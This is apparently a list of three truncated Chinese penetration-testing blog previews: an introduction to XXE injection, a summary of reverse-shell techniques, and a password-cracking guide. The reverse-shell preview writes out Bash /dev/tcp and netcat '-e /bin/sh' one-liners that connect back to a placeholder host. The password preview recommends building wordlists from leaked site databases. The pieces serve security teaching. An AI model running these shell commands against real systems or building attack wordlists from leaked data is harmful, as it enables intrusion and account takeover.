XXE注入:攻击与防御 - XXE Injection: Attack and Prevent
0x00 前言
XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.
漏洞是在对非安全的外部实体数据进行处理时引发的安全问题.
在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念.实体可以通过预定义,并在文档中调用,实体的标识符可访问本地或远程内容.
如果在这个过程中引入了"污染"源,在对XML文档处理后则可能导致信息泄漏等安全问题.
0x01 威胁
XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:
......
渗透测试:反弹与转发小结 - Reverse Shell During the Penetration Test
0x00 前言
在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.
0x01 反弹shell
1) Bash
部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
2) NetCat
Netcat反弹shell也是常用兵器,经典命令参数-e
nc -e /bin/sh x.x.x.x 2333
但某......
渗透测试:密码破解小结 - Cracking Password During The Penetration Test
0x00 前言
一次测试的过程总会涉及到"密码"与"加解密".在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘.以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误,还望不吝赐教.
0x01 整理一份优秀的字典
想破解密码,要求我们已经"拥有"别人的密码.字典在口令扫描尝试过程中的重要性不言而喻.要整理一份优秀的字典,不妨参考各大网站泄漏数据库,将密码(明文)字段收集后,依出现频率......